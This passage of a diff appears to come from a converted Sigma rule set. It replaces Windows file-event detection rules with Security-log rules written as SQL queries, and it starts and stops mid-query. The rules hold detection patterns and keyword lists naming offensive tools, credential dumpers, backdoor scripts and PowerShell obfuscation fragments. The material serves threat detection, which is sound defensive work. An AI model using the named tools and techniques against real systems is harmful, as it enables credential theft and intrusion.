'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_create_evtx_non_common_locations.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.command_and_control", - "attack.t1219" + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "Suspicious Double Extension Files", - "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.impact", - "attack.t1486" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Startup Folder File Write", - "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", - "status": "test", - "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", + "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "file_event_win_startup_folder_file_write.yml" + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "title": "ISO Image Mount", + "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the mount of ISO images on an endpoint", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Software installation ISO files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_iso_mount.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", - "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" }, { - "title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "title": "Suspicious Kerberos RC4 Ticket Encryption", + "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "status": "experimental", + "description": "Detects service ticket requests using RC4 encryption type", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unlikely" + "Service accounts used on legacy systems (e.g. NetApp)", + "Windows Domains with DFL 2003 and legacy systems" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_susp_rc4_kerberos.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", - "status": "test", - "description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "status": "stable", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Initial installation of a domain controller" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE 